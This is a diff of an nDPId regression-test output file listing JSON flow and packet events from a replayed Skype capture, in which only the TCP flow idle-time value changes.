00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03rMAAEARUOLAqAEi1cezkTLdnFsAIONWnJoCpMZAnYkDnzYrDpEHe3Wyl3Fm6DsP"} 00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -720,84 +720,84 @@ 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/mMEAAEARl0\/AqAEinTfrmzLdnEMAK8StnJ4Ceg13qBmaNbQ5r3u++QJg+\/7hY4I5I2kK1W2d7qoWGw0="} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692087,"flow_last_seen":1431969692087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969692087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1431969692087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969692087,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWFBAAEAGALbAqAEinTeCsMOhAbuvVQecAAAAALAC\/\/9OOgAAAgQFtAEDAwUBAQgKPiNMnwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1431969692210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969692210,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7w6FI4LuBr1UHnaASOJC+bQAAAgQFrAQCCApOpRUtPiNMnwEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1431969692210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969692210,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0dU1AAEAG48TAqAEinTeCsMOhAbuvVQedSOC7goAQECwVHQAAAQEICj4jTRpOpRUt"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692087,"flow_last_seen":1431969692087,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969692087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1431969692087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969692087,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWFBAAEAGALbAqAEinTeCsMOhAbuvVQecAAAAALAC\/\/9OOgAAAgQFtAEDAwUBAQgKPiNMnwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1431969692210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969692210,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7w6FI4LuBr1UHnaASOJC+bQAAAgQFrAQCCApOpRUtPiNMnwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1431969692210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969692210,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0dU1AAEAG48TAqAEinTeCsMOhAbuvVQedSOC7goAQECwVHQAAAQEICj4jTRpOpRUt"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1431969692507,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969692507,"pkt":"0NQSxnP1PBXCt3IOCABFAABAlm8AAEARZQTAqAEib91NkjLdgQkALPOBnKACf9Ciuj22pCihR6NIjTKXTxwVlkuMzvocVlIJl4RJ8z3V"} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969695483,"flow_last_seen":1431969695483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969695483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1431969695483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969695483,"pkt":"0NQSxnP1PBXCt3IOCABFAABAoJZAAEAGGuzAqAEib91NjsOmnFcVc978AAAAALAC\/\/\/LYQAAAgQFtAEDAwUBAQgKPiNZ1AAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":2,"flow_last_seen":1431969695778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969695778,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIpxXw6bHcDhRFXPe\/aASOJD2ggAAAgQFrAQCCApNjF\/4PiNZ1AEDAwk="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":3,"flow_last_seen":1431969695779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969695779,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IC9AAEAGm1\/AqAEib91NjsOmnFcVc979x3A4UoAQECxMhgAAAQEICj4jWvtNjF\/4"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969697097,"flow_last_seen":1431969697097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969697097,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1431969697097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969697097,"pkt":"0NQSxnP1PBXCt3IOCABFAABAaXZAAEAGUgzAqAEib91NjsOnAbtL1T0XAAAAALAC\/\/\/LOAAAAgQFtAEDAwUBAQgKPiNgHAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":2,"flow_last_seen":1431969697478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969697478,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIgG7w6e9PNNuS9U9GKASOJBj3AAAAgQFrAQCCApNjGGMPiNgHAEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":3,"flow_last_seen":1431969697478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969697478,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Y41AAEAGWAHAqAEib91NjsOnAbtL1T0YvTzTb4AQECy5igAAAQEICj4jYZhNjGGM"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969697530,"flow_last_seen":1431969697530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969697530,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1431969697530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969697530,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWjtAAEAGlejAqAEinTfrksOogQnO4dHgAAAAALAC\/\/9nBQAAAgQFtAEDAwUBAQgKPiNhywAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1328,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":2,"flow_last_seen":1431969697602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969697602,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIoEJw6jH8XvBzuHR4aASOJCSaAAAAgQFrAQCCApMXRz0PiNhywEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":3,"flow_last_seen":1431969697602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969697602,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0UqNAAEAGnYzAqAEinTfrksOogQnO4dHhx\/F7woAQECzpSwAAAQEICj4jYhJMXRz0"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969695483,"flow_last_seen":1431969695483,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969695483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1431969695483,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969695483,"pkt":"0NQSxnP1PBXCt3IOCABFAABAoJZAAEAGGuzAqAEib91NjsOmnFcVc978AAAAALAC\/\/\/LYQAAAgQFtAEDAwUBAQgKPiNZ1AAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":2,"flow_last_seen":1431969695778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969695778,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIpxXw6bHcDhRFXPe\/aASOJD2ggAAAgQFrAQCCApNjF\/4PiNZ1AEDAwk="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":3,"flow_last_seen":1431969695779,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969695779,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IC9AAEAGm1\/AqAEib91NjsOmnFcVc979x3A4UoAQECxMhgAAAQEICj4jWvtNjF\/4"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969697097,"flow_last_seen":1431969697097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969697097,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1431969697097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969697097,"pkt":"0NQSxnP1PBXCt3IOCABFAABAaXZAAEAGUgzAqAEib91NjsOnAbtL1T0XAAAAALAC\/\/\/LOAAAAgQFtAEDAwUBAQgKPiNgHAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":2,"flow_last_seen":1431969697478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969697478,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIgG7w6e9PNNuS9U9GKASOJBj3AAAAgQFrAQCCApNjGGMPiNgHAEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":3,"flow_last_seen":1431969697478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969697478,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Y41AAEAGWAHAqAEib91NjsOnAbtL1T0YvTzTb4AQECy5igAAAQEICj4jYZhNjGGM"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969697530,"flow_last_seen":1431969697530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969697530,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1431969697530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969697530,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWjtAAEAGlejAqAEinTfrksOogQnO4dHgAAAAALAC\/\/9nBQAAAgQFtAEDAwUBAQgKPiNhywAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1328,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":2,"flow_last_seen":1431969697602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969697602,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIoEJw6jH8XvBzuHR4aASOJCSaAAAAgQFrAQCCApMXRz0PiNhywEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":3,"flow_last_seen":1431969697602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969697602,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0UqNAAEAGnYzAqAEinTfrksOogQnO4dHhx\/F7woAQECzpSwAAAQEICj4jYhJMXRz0"} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1431969698508,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1431969698508,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABIoEQAAEARVbXAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1431969698743,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969698743,"pkt":"0NQSxnP1PBXCt3IOCABFAABEy5wAAEARK5nAqAEiwKgBAfdZADUAMBpr\/I4BAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":2,"flow_last_seen":1431969698797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431969698797,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA191kAQKAy\/I6BgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAABAABBfOIaY="} 00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698797,"flow_last_seen":1431969698797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 